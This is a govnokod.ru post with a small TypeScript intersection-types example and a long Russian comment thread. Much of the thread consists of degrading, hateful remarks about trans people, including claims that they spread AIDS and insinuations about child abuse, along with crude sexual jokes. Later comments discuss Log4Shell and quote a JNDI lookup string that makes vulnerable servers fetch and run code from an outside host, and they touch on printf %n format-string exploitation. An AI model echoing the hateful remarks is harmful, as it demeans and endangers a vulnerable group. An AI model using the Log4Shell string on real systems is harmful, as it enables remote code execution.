1. JavaScript / Говнокод #27874

    0

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    interface F1 {
        a: number;
        a2: boolean;
    }
    
    interface F2 {
        b: string;
        b2: number;
    }
    
    type t = F1 & F2 & { c: number };
    
    interface t2 extends F1, F2 {
        c: number;
    }
    
    type tt = { a: boolean };
    type tt2 = { b: number };
    type tt3 = { c: string };
    
    type r = tt & tt2 & tt3;
    
    function main() {
    
        const f1: F1 = { a: 10.0, a2: true };
        print(f1.a, f1.a2);
    
        const f2: F2 = { b: "Hello1", b2: 20.0 };
        print(f2.b, f2.b2);
    
        const a: t = { a: 10.0, a2: true, b: "Hello", b2: 20.0, c: 30.0 };
        print(a.a, a.a2, a.b, a.b2);
    
        const b: t2 = { a: 10.0, a2: true, b: "Hello", b2: 20.0, c: 30.0 };
        print(b.a, b.a2, b.b, b.b2, b.c);
    
        const c: r = { a: true, b: 10.0, c: "Hello" };
        print(c.a, c.b, c.c);
    
        print("done.");
    }

    я вам тут conjunctions наговнокодил.... а нужен дампик?

    Запостил: ASD_77, 15 Декабря 2021

    Комментарии (161) RSS

    • типа.. опа
      Ответить
    • А что это? Поклейка структуры из нескольких?
      Ответить
      • без контекста не понять, чем отличается interface от type. Как мы видим, и то и то можно инстанцировать
        Ответить
        • interface это тип декларация интерфейса.... а type это новый тип из существующих типов... это если сказать type "Хочу новый алиас для типа" = boolean;
          Ответить
      • да. это быстрый способ создать тип из существующего типа.. удобно если надо что-то скомбинировать и не переписывать типы опять опять и опять
        Ответить
    • Что такое "дампик"?
      Ответить
      • Примерно так выглядит
        https://docs.microsoft.com/en-us/shows/inside/access-violation-c0000005-execute
        Ответить
    • never = string & number
      never = number & boolean
      string & number = number & boolean
      string = boolean (QED)
      Ответить
      • Вот значит почему булы через строки проверяют.

        http://govnokod.ru/1003

        Это ведь одно и то же
        Ответить
        • Да, индийские математики не дадут соврать...
          Ответить
      • значение строк никогда не пересекает значение чисел. числа не пересекаются с булеаном. пересечение строк и чисел равно пересечению чисел и булеанов. а на каком основании строки начали равняться булеану?
        Ответить
    • type orgy = Anton & Ivan & Boris & moi;
      Ответить
      • JaneBurt забыл добавить: трапы – отвратительные содомиты и участвуют в оргиях, это факт.
        Ответить
        • У многих трапов это вынужденная мера: все деньги уходят на гормоны, и, чтобы осталось на еду, им приходится участвовать в оргиях, за которые им заплатят, потому что на приличную работу их не берут.

          Экономика сурова.
          Ответить
          • Забыл в JIoJIe4Ka залогиниться?
            Ответить
            • Нет, твитторов начитался. Некоторые зачем-то ретвитят трапов и сочувствующих трапам.

              Трапы постоянно ноют, что им не хватает денег. Довольно распространены твиты типа: «Плиз, хелп! Не хватает денег на гормоны и на еду. Моя карта 265 666 1313 1488. РЕТВИТ для увеличения охвата.»

              Некоторые рекламируют магазины одежды или косметики. Типа: «Друзья, используйте промокод PETUH265, мне за это копеечка упадёт».

              Бизнесмены из бигфармы очень рады, что трапы ради денег готовы идти на любые унижения. «Они будут на четвереньках ползать, а мы им на спину плевать».
              Ответить
              • Ага. Только згт я начала, когда уже нашла "приличную" работу. До этого был мрак и пиздец с переходным периодом в виде скитания по коммуналкам Мухосранска после дропнутого вуза и работы вебмакакой-аникеем на доширак.
                Ответить
                • Кста я на своей шкуре знаю что такое PHP...
                  Ответить
                  • От пыхи и жс не зарекаются.
                    Ответить
                    • Не, ЖС во второй половине 10-х стал как-то по-приличнее и посложнее тулингом, архитектурой приложений. Хотя отношение бизнеса к GUI "и так сойдет, зачем оптимизировать?", склонность фронтовиков тянуть на очередной fsm или expiration кэш либу, не понимая как этот самый fsm или кэширование работает, удручает (влияение индус-дева, который берет тот же Реакт тупо потому что "так делают крутые компании"). Хотя запилить хороший фронт (особенно с "графодрочевом") сложно. В гейдев идти не хочу, поетому смотрю в сторону бэка на Го. Там хоть комьюнити больше вникает в то как работает код и поменьше тянет зависимостей, лучше знает базовые алгоритмы.
                      Ответить
                      • >>Там хоть комьюнити больше вникает в то как работает код и поменьше тянет зависимостей, лучше знает базовые алгоритмы.

                        бред сивой кобылы... знание алгоритмов нигде не надо... ни одна программа не может быть сложнее чем "select" в SQL. Если в программе нужны какие-то алгоритмы это показатель того, что происходит разработка велосипеда... и должна быть терминирована немедленно!
                        Ответить
                        • > знание алгоритмов нигде не надо
                          плюсану. программисты должны программиы писать, зачем им алгоримты?

                          >ни одна программа не может быть сложнее чем "select" в SQL

                          вот тут не согласен: бывают программы с несколькими if и for. я однажды видал программу с десятком ифов, но такие сложные сайты конечно редко встречаются
                          Ответить
                          • Алгоритмы должен писать алгоритмист.
                            Ответить
                            • Без шуток, так и надо.
                              Недавно мы видели код, где программист написал кучу кода с 1000 и 1 реализацией пузырька. Зачем? Зачем?
                              Ведь в стандартной или сторонней библиотеке есть функция сортировки, которую можно было бы использовать.

                              Написание алгоритмов в чистом виде нужно в 1% случаев, когда
                              * Это новый алгоритм, ведётся его отладка,
                              * Это написание библиотеки под новый язык/алгоритм/тип данных,
                              * Это супервысокий пирфоманс, когда надо инлайнить алгоритм руками в код.
                              Ответить
                          • > бывают программы с несколькими if и for
                            Дык в «SQL» вполне себе имеются что if, что for («cross lateral join» — вполне себе for).
                            Ответить
                            • На pl/sql и transact-sql вообще можно писать императивно.
                              Но я бы не советовал.

                              Тяжелые накротики выглядят так:
                              CREATE PROCEDURE mass_email AS
                              declare @email nvarchar (50) 
                              declare @body nvarchar (255)  
                              
                              declare test_cur cursor for             
                              SELECT email from [dbo].[EmailMessageTable]
                              
                              open test_cur                                        
                              
                              fetch next from test_cur into   
                              @email     
                              while @@fetch_status = 0       
                              begin                                    
                              
                              set @body = (SELECT body from [dbo].[EmailMessageTable] where email = @email)
                              EXEC msdb.dbo.sp_send_dbmail
                                  @profile_name = 'profile',
                                  @recipients = @email,
                                  @body = @body,
                                  @subject = 'Credentials for Web';
                              fetch next from test_cur into  
                              @email 
                              end    
                              close test_cur   
                              deallocate test_cur

                              маленькая доза крокодила -- так
                              CREATE OR REPLACE PROCEDURE greetings 
                              AS 
                              BEGIN 
                                 dbms_output.put_line('Hello World!'); 
                              END;
                              Ответить
                              • А в триггере можно почту отправлять?
                                Ответить
                                • Да, разумеется:
                                  https://database.guide/send-email-from-a-trigger-in-sql-server-t-sql/

                                  Можно формировать отчеты, класть их впапку, и слать по емейлу.

                                  Давным давно были такие двухзвенные архитектуры, где DBA писал всю базу и всю логику на этом говне, а потом к нему всякие клиенты на VBA или Delphi подцеплялись чисто чтобы красивую формочку нарисовать.

                                  Так конечно давно уже никто не делает
                                  Ответить
                              • Во многих СУБД так можно, даже в MySQL. Только эта питушня по-разному называется и язык несовместимый. При портировании на другую СУБД придётся переписывать с нуля.
                                Ответить
                                • Кстати, в MS-SQL можно писать эти процедуры на .NET
                                  В оракле вроде на жаве
                                  А в постгре вообще миллион языков, хоть на питоне пиши
                                  https://postgrespro.ru/docs/postgresql/9.6/plpython

                                  Только не надо так делать всё таки. База должна быть базой, а логика должна быть в отдельном приложении
                                  Ответить
                                  • Да, от количества языков в Постгре я впал в ступор. Хоть всю программу в базе держи.
                                    Ответить
                                    • Зато можно сделать высокоуровневый API к базе и гарантировать консистентность

                                      Системой внешних ключей и констреинтов не всегда ее можно гарантировать, потому современные базы подчас консистентны только стараниями приложения уровня логики (так в джанге, например, и в рельсах)

                                      Иными словами, руками в такую базу лучше не лазить

                                      Можно вообще API в базе выразить через процедуры, раздать им премишены, и никто не сомжет там тебе INSERT сделать мимо твоей процедуры
                                      Ответить
                                      • В хайлоаде вообще на констрейнты не полагаются и восстанавливают консистентность отдельным фоновым процессом.
                                        Ответить
                                        • В хайлоаде вообще реляционок как таковхы нет, их там очень странно юзают

                                          сильно нормализованная СУБД требует 24 джойна, а это непомерная цена для хайлоада


                                          Я как-то работал в ужасном проекте, где слоя логики не было (точнее он был совмещен с гуем) и автоматизацию действий надо было делать либо через селениум, либо руками в базе

                                          суппортеры лазили руками в базу, и часто забывали, что поменять что-то нужно в семи местах. Одно место пропускали, и был пиздец:)

                                          надо было конечно в логике сделать REST или SOAP Api, и напилить к нему клиента
                                          Ответить
                                    • Именно поэтому я за ``Mnesia''.
                                      Ответить
                      • > ЖС во второй половине 10-х стал как-то по-приличнее
                        Есть мнение что всё ровно наоборот.

                        > поетому смотрю в сторону бэка на Го
                        Понятненько...
                        Ответить
                    • А вот от PHP у меня только вьетнамские флэшбеки...
                      Ответить
                      • У меня вьетнамские флешбеки от жс времён IE...
                        Ответить
                        • Ну тогда надо было надевать крестик, чтобы делать под IE. Впрочем такая же маза сейчас с Сафари.
                          Ответить
                          • > сафари

                            Хм, а оно же на вебките? Сильно отличается от хрома?
                            Ответить
                            • Да. Это древний Хром работал на WebKit, потом он сменил движок. У Сафари до сих пор нет requestIdleCallback. Но недостающее API - еще полбеды, такое легко отлавливается и "фиксится" полифилом/шимом. Сафари не умеет рендерить "overflow: hidden", когда высота контейнера задана в процентах. look behind в регулярках не работает (с тех пор пишу сама алгоритм для метчинга чего-то в строке, если он простой). И пр. сюрпризы.
                              Ответить
                        • у меня от perl
                          Ответить
                        • Should all the leaves for all the trees
                          Surscorch from bombs and poisoned water,
                          Should not a single Vietnamese
                          Remain alive from cruel man slaughter,
                          The elephants will rage enroll
                          And wage against all the Yanks a war,
                          And wage against all the Yanks a war.

                          Should all the elephants be killed
                          And all the fields be ruined to pieces,
                          Yet life in Vietnam can be still
                          Again arise some living species:
                          The leagues ant and buzzing bees,
                          To sting the Yanks for the Vietnamese,
                          To sting the Yanks for the Vietnamese.

                          The birds and fish will take them bite,
                          All those, who came to kill and murder,
                          The snakes will hiss from noon till night
                          And then more bees will come further,
                          The animals will keep their rakes
                          Until the drive all away the Yanks,
                          Until the drive all away the Yanks.

                          Should all the beasts become extinct
                          The grass will raise from bombard tuffet,
                          And by the nature of instinct
                          Will crash the Yanks for those, who suffer.
                          You can not slash in hand a breeze
                          Not split the land of the Vietnamese,
                          Not split the land of the Vietnamese.
                          Ответить
                      • Потом они спрашивают, почему я за «PHP». Да вот хотя бы поэтому.
                        Ответить
                    • Кто не писал на «PHP», тот будет.
                      Кто писал, тот не позабудет.
                      Ответить
                      • Есть люди, у которых просто звериная ненависть ко всему технологичному и промышленному в программировании.

                        Ведь когда интернет появился доминирование web и домашних страниц было далеко не очевидным.
                        Тогда в моде были другие полуоффлайновые технологии.

                        Но белые люди нашли в себе силы и создали божественные «PHP» и «ECMA-262».

                        И web рацвёл, развился, стал тем с чем сейчас у всех ассоциируется интернет.

                        Нужно помнить об этом, когда очередной подлец и выблядок отсылает свою желчь пользуясь JavaScipt на сайт сделанный на PHP.
                        Ответить
                        • Не попал в web — радуйся, а попал — держись.
                          Ответить
                          • Постоянно удивляюсь: откуда лезет столько бездарных ничтожеств и заедушных неудачников.
                            Столько отрепья, которое норовит обгадить прорывные технологии и великих людей.

                            >as of April 2021, «PHP» is used by 79.2% of all the websites whose server-side programming language we know

                            Сидит безработный неудачник на мамкиной шее и умничает в каком-нибудь петушином углу вроде /pr.

                            Дескать «PHP» говно, «JS» дрянь. Вот «Haskell»«Rust», «TypeScript» или «Scala»«Kotlin»,«Go» вот это Языки, да.

                            Update: исправил хачкель на дrustню, а шкалку на ко-ко-тлен и goвнище.
                            https://insights.stackoverflow.com/survey/2020#technology-most-loved-dreaded-and-wanted-languages-loved
                            Ответить
                • Как жаль, что тебе, в отличие от 99.99% трапов, удалось выкарабкаться. Лично я считаю, что если человек себе отращивает сиськи, накачивает губы и надевает стринги, чтобы быть «куклой для сэкса», то и жить такому человеку нужно в притоне.
                  Ответить
                  • Какая токсичная лолечка )))
                    Ответить
                    • Это токсичный оффтоп.
                      Ответить
                    • И на её улице камаз с гормонами перевернётся...
                      Ответить
                      • А ты кстати принимаешь гормоны?
                        Ответить
                        • Я – да. Регулярно получаю тестостерон из мяса, мяса устриц и мяса имбиря.

                          Тестостерон превращает мужчину в вечный секс-двигатель. Наличие гормона в организме приводит к тому, что мужчина всегда готов к сексу и круглосуточно мечтает о том, чтобы уложить кого-нибудь в постель. Мужчины успешнее женщин из-за тестостерона. Тестостерон ассоциируется с напористостью, целеустремленностью, повышенной устойчивостью к стрессу, здоровой амбициозностью.

                          Чтобы повысить уровень тестостерона и стать настоящим мачо, нужно налегать на мясо и сметану.
                          Ответить
                          • Ты употребляешь генетически модифицированный имбирь?
                            Ответить
                          • А потом берет кредит на свадьбу и вечерами подрабатывает, чтобы оплатить сделанное женой увеличение губ. Ведь мужчины не плачут.
                            Ответить
                            • А жена тем временем своими губами отсасывает няшному трапику, потому что его не берут на нормальную работу и у трапика в итоге остаётся много времени на недетородный секс, оргии и прочие содомитские извращения.
                              Ответить
                            • Ведь женатыми не рождаются,
                              Женатыми умирают.
                              Ответить
                        • Кстати, в питушином мясе есть гормоны? Говорят, что петухов на птицефермах гормонами кормят.
                          Ответить
                      • Камаз Гормонов
                        Ответить
                    • Меньше знаешь - крепче спишь...
                      Ответить
                      • иногда мне кажется тут одни трапы
                        Ответить
                        • > тут одни трапы
                          https://image.shutterstock.com/image-photo/row-gangways-boarding-alighting-passengers-260nw-1672313917.jpg
                          Ответить
                        • День отлёта, день прилёта
                          за день посчитаем.
                          Нам предписан нашим веком
                          скоростной режим.
                          Мы, как птицы, мы, как птицы,
                          мы летаем,
                          Потому, что каждым часом
                          дорожим.

                          Аэропорт! Стою у трапа самолёта.
                          Аэропорт! По мне скучает высота.
                          Аэропорт! Гляди, меня встречает кто-то
                          На том конце воздушного моста.
                          Ответить
            • Это суровая реальность на самом деле. Трапы тяжело социализируются в силу своего расстройства, особенно те у которых аутизм вдобавок. "На приличную работу" нужен IQ >= 110, которого у многих трапов нет (как и у многих людей вообще). А так, Э и А нифигово ревертят некоторые autistic traits, что позволяет увереннее коммуницировать с людьми.
              Ответить
              • > увереннее коммуницировать с людьми

                Офигеть, дайте две.
                Ответить
                • Не поддавайся на пропаганду греховного образа жизни, разлагающего душу.

                  На самом деле у трапов просто едет крыша от гормонов и бесконечных операций, поэтому они и могут становиться общительнее, либо им просто так кажется, что они стали общительнее, когда втянулись в круги таких же сирых и убогих, заботящихся друг о друге по мере возможностей.
                  Ответить
                • Возможно, на тебя просто напал кефальный паразит. Обратись за помощью в отделение МЧС Магнитошахтинской области.
                  Ответить
              • Забыл в JIoJIe4Ka залогиниться?
                Ответить
          • > на приличную работу их не берут

            На завод таскать железки и точить детали? Да, это работа не для девочек...
            Ответить
            • Почему? Тян вполне работают и на станках и на сварке.
              Ответить
              • Потому что тян в целом физически слабее мужчин. И от женских гормонов бицепсы с трицепсами слабеют. Конечно, есть тян которые работают сварщицами, токарями и пр. (как и мужчины-визажисты, воспитатели в детском саду и пр.). Но это исключение.
                Ответить
                • Да там больше внимательность и аккуратность...
                  Ответить
              • Все эти рассуждения базируются на ложных предпосылках равенства, в то время, как число синаптических связей у самок на 15% ниже.

                https://i.4pcdn.org/pol/1500846827810.jpg
                Ответить
                • Сколько там связей реально используется у человека?
                  Ответить
                  • Не знаю, что там насчёт связей, но трапы вступают в половые связи друг с другом, чтобы разносить СПИД и прочие половые инфекции.

                    Хотя, казалось бы, кто будет корпеть над вонючей дыркой-пиздилищем, сделанной из прямой кишки врачом-содомитом? Но находятся и такие лузеры)
                    Ответить
                  • Никто не знает. Может и не узнает никто, так как в этом случае Святая Наука снова оказалась росисткой

                    https://i.postimg.cc/Gphvy0Ft/image.gif
                    Ответить
            • Я где-то читал, что даже ЛГБТушня/феминистки презирают трапов за то, что те поддерживают гендерные стереотипы.

              В то время, как некоторые феминистки пытаются выбить себе равные права с мужчинами и подвинуть стеклянный потолок, типичный трап накачивает губы, делает себе дойки и автозагар, и начинает заниматься извращённым сексом с множеством половых партнёров.

              А поскольку и феминистки, и ЛГБТшники, и трапы – всё леваки в глазах обывателя, то первые две категории презирают трансов и трансух за то, что трапы ведут себя как мрази и дискредитируют левацкую повесточку.
              Ответить
      • [deleted]
        Ответить
      • JloJle4Ka - это шизик которому мерещатся трапы в девушках. Не обращай внимания.
        Ответить
      • Мари Лафоре, какими судьбами?
        Ответить
      • это не оргия - это три в одной(ом)
        Ответить
        • А настоящая оргия — это сколько в скольких?
          Ответить
          • Если верить Википедии (n-body problem), то 1 – это не с*екс, 2 и 3 – уже с*екс но ещё не орг*ия, а вот 4 и более – это уже самая настоящая орг*ия!
            Ответить
            • То есть отношение «три к одному» это уже орг*ия, потому что в сумме четыре?
              Ответить
          • А настоящий хайлоад -- это сколько в скольких?
            Ответить
      • JaneBurt - это шизик которому мерещатся лолечки на говнокоде. И у которого из-за гормонов растёт некрасивая, кривая жировая прослойка (молочных желёз там нет и никогда не будет, поэтому и настоящей груди у JaneBurt никогда не будет). Не обращай внимания.
        Ответить
        • А молочное железо ещё не научились вживлять?
          Ответить
          • Ещё нет, но можно за двадцать ментоловых сигарет попросить вшить туда пакеты с молоком, а сверху, вместо сосков, прилепить пульверизатор.

            Вряд ли человек, опустившийся настолько, чтобы менять пол, найдёт эту операцию неэстетичной.
            Ответить
            • Какой киберпанк )))
              Ответить
            • https://nplus1.ru/news/2018/02/15/transgender-lactation
              > Исследователи из Нью-Йорка впервые смогли успешно вызвать лактацию у женщины-трансгендера. Они добились этого с помощью гормональной терапии и использования молокоотсоса. Ученые сообщают, что молока у пациентки было достаточно, чтобы ее ребенок в течение первых шести недель жизни обходился без искусственных смесей. Случай подробно описан в статье, опубликованной в журнале Transgender Health.
              ...
              > Тридцатилетняя женщина обратилась в один из медицинских центров Нью-Йорка с просьбой вызвать лактацию для кормления ребенка, которым в тот момент была беременна ее партнерша (она сама отказывалась от грудного вскармливания). Пациентка находилась на гормонотерапии для смены пола с мужского на женский с 2011 года (в течение шести лет до начала экспериментального вызова лактации).
              Ответить
              • Бедный ребёнок. Как родители ему объяснят, почему у его отца сиськи и почему отец называет себя в женском роде?
                Ответить
                • Ничего страшного, у ребёночка в семье извращенцев не будет времени о таком задумываться: ему придётся участвовать в извращённых содомитских оргиях и терпеть домашнее насилие в перерывах между.
                  Ответить
              • Охуенная новость!

                Без шуток: это очередная победа человеческого разума над оковами плоти, и это охуенно. Пусть и на совсем небольшую величину, но исследователи из Нью-Йорка всё же прибилизи будущее, в котором люди смогут менять свои мясные мешки как сегодня меняют одежду.
                Ответить
        • Удивлю, но молочные железы есть у всех, кроме тех, кому их удалили.

          У мужчин в норме они находятся в зачаточном состоянии из-за тестостерона.

          google: гинекомастия

          У некоторых мужчин бывает жировая гинекомастия, когда на груди растёт жир. А у некоторых бывает железистая гинекомастия, когда растут железы. Второй вариант бывает при дефиците тестостерона или когда тестостерон из-за нарушения обмена веществ не всасывается в грудь или при избытке женских гормонов.

          Грудь может вырасти при злоупотреблении пивом, потому что хмель содержит аналог эстрогена. Правда, для достижения эффекта нужно выпить столько пива, что половина мозга от алкоголя разрушится. Но трапов последнее наверняка не очень беспокоит.
          Ответить
          • > Второй вариант бывает при дефиците тестостерона или когда тестостерон из-за нарушения обмена веществ не всасывается в грудь или при избытке женских гормонов.

            Двачую. Никакой жировой груди нет.
            Ответить
    • Хорошая программа, после неё ни один ребёнок устанавливать линукс уже не будет.
      Ответить
      • Почему?
        Ответить
        • Потому что она создана для KDE.
          Ответить
          • Ребёнок зайдёт на форум анимешников, пропатчит KDE под FreeBSD и попытается пересобрать программу под FreeBSD, чтобы не устанавливать Линукс?
            Ответить
    • This issue allows a guest VM to force the Hyper-V host's kernel to read from an arbitrary, potentially invalid address.
      https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28476
      Ответить
      • > This issue allows a guest VM to force the Hyper-V host's kernel

        Порнуха какая-то...
        Ответить
      • Именно поэтому в прыщах пытаются убрать большую часть гипервизора в юзермод, где она будет крутиться в анально огороженном seccomp'ом и apparmor'ом процессе...

        Хотя вот казалось бы, у hyper-v тоже всё по-максимуму обрезано. Во второй версии она даже железки не эмулирует.
        Ответить
        • Там снизу вторая ссылочка забавнее, где арабитари код

          Алсо, есть длинный скучный лоулевелный презщентаций с блекхата где они ломают через vmbus
          Ответить
          • > через vmbus

            Конкретный девайс на этом автобусе или прям сам транспорт?

            Блин, там же такие простые протоколы, как в них обосрались то... какую-то гонку словили?
            Ответить
            • ломали сам бас, но я не досмотрел чем кончилось

              а еще ломали виртуальный свитч посылая спешали крафтд кадр, и вот через него ломали хост

              дыра вроде была в rndis
              Ответить
              • А теперь задумайся, насколько гипер прост по сравнению с ядром и юзермодом.

                Он не понимает файлухи, а тупо передаёт сектора. Он не понимает ни TLS ни TCP, а тупо передаёт фреймы. Он не рисует гуйню, а тупо мапает фреймбуфер и передаёт ивенты от мышки. В нём нету хитровыебанных политик и настроек. Ему не надо тащить на себе гигабайты легаси говна из 70х. Гипер-в даже от эмуляции легаси железок отказалось, только vmbus, только хардкор.
                Ответить
                • Блядь да как же быть безопасным?
                  Реально вот выделять виртуалкам отдельный физический адаптер и пробрасывать его напрямую (SRV-IO тут поможет?) а виртуалкин адаптер вообще от сети отрубать?

                  Хотя ведь тоже может не помочь в случае vmbus
                  Ответить
                  • Ну вообще у меня к vmbus больше доверия. У него одна реализация и его когда-нибудь да вылижут.

                    В случае с пробросом ты вступаешь на тонкий лёд, где в поверхность атаки включаются сам девайс, материнка, мосты, прошивка, дрова хоста и т.п. И в отличие от vmbus кода и электроники там участвует на порядки больше.

                    Проброс важен для пирфоманса, а не для безопасности.
                    Ответить
              • И да, в отличие от обычных осей и софта, гиперы дизайнятся под минимализм и безопасность.

                Тлен и безысходность.
                Ответить
                • ну кстати в VMWare вроде подобных проблем нет, там правда все какают кирпичами потому что клиентский софт там на жаве и log4j
                  Ответить
                  • Почему из-за этого надо какать кирпичами?
                    Ответить
                    • ты не слышал про дыру в l4j? ты что, с марса?
                      Ответить
                      • Кстати, я правильно понимаю, что если заблочить исходящие соединяния на какой-нибудь там порт для log4j, то мне эта уязвимость будет не страшна?

                        Я устал бояться Jawa, нужно обуздать её.
                        Ответить
                        • Ну в теории да, если забанить ей всё кроме нужного тебе сервера майнкампфа, то она не сможет скачать эксплойт.

                          Но тут надо доверять админам, вдруг они сами его выложат...

                          З.Ы. Официальную сборку то поди обновили?
                          Ответить
                          • А, так этот логгер ещё и по обычному какому-то TCP/UDP ходит?

                            Я думал, что для этой питушни какой-то свой порт входящий-исходящий. Тогда придётся в «Minetest» играть (игра известна тем, что ТОРТ выучил «lua», чтобы писать для неё моды).

                            Можно было бы ОБНОВИТЬ эту питулю, но писали, что и после фикса это говницше сломали (((
                            Ответить
                            • Last Thursday, the world learned of an in-the-wild exploitation of a critical code-execution zero-day in Log4J, a logging utility used by just about every cloud service and enterprise network on the planet. Open source developers quickly released an update that patched the flaw and urged all users to install it immediately.

                              Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update. The researchers are urging organizations to install a new patch, released as version 2.16.0, as soon as possible to fix the vulnerability, which is tracked as CVE-2021-45046.

                              ***

                              Какая гидра (((
                              Ответить
                              • Смешно не это. Про 2.15 тоже забавно (https://govnokod.ru/27862#comment750258)

                                Но не настолько.
                                А вот то что некие умники запилили сайт patch.log4shell.com, который использует саму дыру чтобы удалённо выполнить код. Сделать live-patch на выбранном сервере и закрыть уязвимость.

                                If you find yourself stuck between a rock and a hard place for fixing this issue at your company, you might find yourself wishing for something better. Fortunately, the clever people of the internet have come up with a solution that may help you remedy this painful situation.

                                By placing this string...

                                ${jndi:ldap://patch.log4shell.com:1389/a}

                                ...anywhere you can in your infrastructure that you're vulnerable to Log4Shell, you will be rolling out a temporary fix that gives you more time to patch.

                                We run that server, but it's been built due to the work of many smart people working on and dealing with the fallout from Log4Shell. We've just made it a little easier for you to use by hosting it for you.
                                There be dragons!

                                This string will attempt to exploit the Log4Shell vulnerability and apply a patch to your live system. While this patch has been tested on a number of systems, your system might be different and could possibly crash. You have been warned.

                                If it doesn't work for some reason, your server will hang and possibly need a manual restart.


                                Достойное энтерпрайсное решение, да.
                                Ответить
                              • У меня в контроллерах нет никакого "Log4J", поэтому я за контроллеры
                                Ответить
                            • Эм, я про то что сам майнкампф ходит, если ты на серваке играешь. А логгер уже пойдёт когда ему команду передадут в чатике.

                              Если ты в оффлайне, то бояться нечего. Хотя можешь для верности весь инет ему забанить.
                              Ответить
                              • > Эм, я про то что сам майнкампф ходит, если ты на серваке играешь

                                Так и я про это!

                                > А логгер уже пойдёт когда ему команду передадут в чатике.

                                Вот я думал, что он только по определённому порту может ходить, поэтому достаточно просто этот порт закрыть. Оказывается, что нет (((
                                Ответить
                        • Разные приложения могут разный порт юзать.
                          Ответить
                      • Не, не слышал
                        Ответить
                        • Ну и пошел нахуй тогда (за мат извини, я нечаянно...)
                          Ответить
                        • В систему для логирования в джаве завезли очень удобную штуку, позволяющую меткой записью нужной строчки в лог загрузить и выполнить любой джава класс
                          Ответить
                          • Гниды, блять!
                            Ответить
                          • Стоп, загрузить имеется ввиду из интернетов, не с диска? 0_о
                            Ответить
                          • Кстати, недавно понял, что это дерьмо мне напоминает: это же классический проёб с сишным printf()!
                            printf(user_input);  // RCE
                            
                            // Надо:
                            printf("%s", user_input);
                            // Либо:
                            fputs(user_input, stdout);
                            Ответить
                            • printf — это пиздец. Если в строке окажутся проценты, printf полезет в стек, в регистры...
                              Ответить
                              • Через %n можно даже что-нибудь запатчить.
                                Ответить
                                • покажи пример как это делать?
                                  Ответить
                                  • https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf
                                    Ответить
                                  • printf("%.16llx%n") запишет 16 по указателю, лежащему на вершине стека + сдвиг до va_args + 8. В теории, подобрав нужное смещение, можно наткнуться на адрес возврата, перейти по нему и записать нужную команду. Правда в 8 байт много не запихнёшь...
                                    Ответить
                                    • Давно хотел спросить, да всё постеснёвывался. Есть ли у тебя хуй, Soul_re©ver? Если да, какой он формы? Грибовидный, такой, да?..
                                      Ответить
                                    • Ну не обязательно адрес возврата править... Можно какой-нибудь флажок переключить и т.п
                                      Ответить
                                  • printbf -- Brainfuck interpreter in printf

                                    https://github.com/HexHive/printbf

                                    Here we take printf-oriented programming one step further and preset a brainfuck interpreter inside a single printf statement.

                                    An attacker can control a printf statement through a format string vulnerability (where an attacker-controlled string is used as first parameter to a printf-like statement) or if the attacker can control the first argument to a printf statement through, e.g., a generic memory corruption. See the disclaimer below for practical in the wild considerations.

                                    Именно поэтому я за «Си».
                                    Ответить
          • З.Ы. И вот после этого я уже не верю, что винда или прыщи когда-нибудь станут безопасными.

            Если сраную виртуалку с минимальной поверхностью атаки и десятком сраных паравиртуализованных девайсов не получается запинать, то что делать с сотнями сисколлов и демонов обычной оси?
            Ответить
            • Я под впечатлением от знакомого почитал бест практисы винды, и они таки пишут изолировать гипервизоры, и никогда не запускать на одном гипервизоре важные машины (например DC) и менее важные (напимер терминалку), так что они видимо так же думают
              Ответить
              • Ну да, не стоит складывать все яйца в одну корзину...

                С другой стороны, тут сначала надо RCE и эскалацию прав в госте, чтобы попасть в его ядро и сесть на автобус. Т.е. надо чтобы звёзды хорошо сошлись и нашлось джве-три подходящих дыры, на которые ты ещё не накатил обновления.
                Ответить
    • An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.


      https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16891
      Ответить
    • Лазурная серийная консоль для Windows

      Экземпляр набора виртуальной машины или виртуальной машины должен использовать модель развертывания управления ресурсами. Классические развертывания не поддерживаются.
      Ответить
      • Однажды джавист женился на переводчице на русский из майкрософта, и у них родился ИнициаторТочкиРазвертыванияУдаленногоМен еджераДиспетчераАсбтрактныйСоздательПоср едникаФабрики
        Ответить
        • Это бесит даже видавший виды AI движка Говнокода.
          Ответить
          • Нет, просто движок знает написание лучше.
            Мен - это мужик, а ПосрЕдник - существо, реализующее биологический цикл.
            Ответить

    Добавить комментарий